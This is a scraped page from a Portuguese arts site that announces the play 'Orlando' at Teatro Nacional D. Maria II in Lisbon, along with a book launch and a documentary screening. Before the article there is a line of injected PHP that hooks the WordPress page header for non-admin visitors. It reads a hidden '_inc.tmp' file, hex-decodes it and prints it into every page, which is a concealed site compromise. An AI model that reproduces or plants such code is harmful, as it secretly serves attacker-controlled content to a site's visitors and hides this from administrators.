if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } D. Maria II - artesentreasletras.com.pt

D. Maria II

Foto: Susana Chico

Orlando, espetáculo da companhia Teatro Nacional 21, com direção de Albano Jerónimo e texto de Cláudia Lucas Chéu, chega a Lisboa, para duas semanas de apresentações na Sala Garrett do Teatro Nacional D. Maria II, de 31 de março a 9 de abril.
Com direção de Albano Jerónimo e texto de Cláudia Lucas Chéu, Orlando é um espetáculo da Teatro Nacional 21 e conta com interpretação de André Tecedeiro, Aurora Pinho, Cláudia Lucas Chéu, Diego Bragà, Eduardo Madeira, Luís Puto, Madalena Massano, Maria Ladeira, Pedro Lacerda, Rita Loureiro e Solange Freitas. Depois da estreia em Guimarães, em dezembro de 2021, o espetáculo chega agora à Sala Garrett do D. Maria II, onde estará em cena de 31 de março a 9 de abril.
No dia 2 de abril, sábado, a partir das 16h00, será ainda possível assistir, no Átrio do D. Maria II, ao lançamento do livro Orlando, um tratado sobre a natureza humana, de Cláudia Lucas Chéu, uma edição TNDM II / BdM (coleção “Textos de Teatro”). Após o lançamento do livro, terá lugar a projeção de Travessia, um documentário criado pela Teatro Nacional 21 e com realização de Eduardo Cunha, que reflete sobre a temática LGBTQIA+ em Portugal, abordando os universos pessoal, ativista e politico-jurídico de diversas testemunhas. Estas atividades têm entrada gratuita, mediante levantamento de bilhete na Bilheteira do Teatro, a partir de uma hora antes do início da sessão e sujeito à lotação do espaço.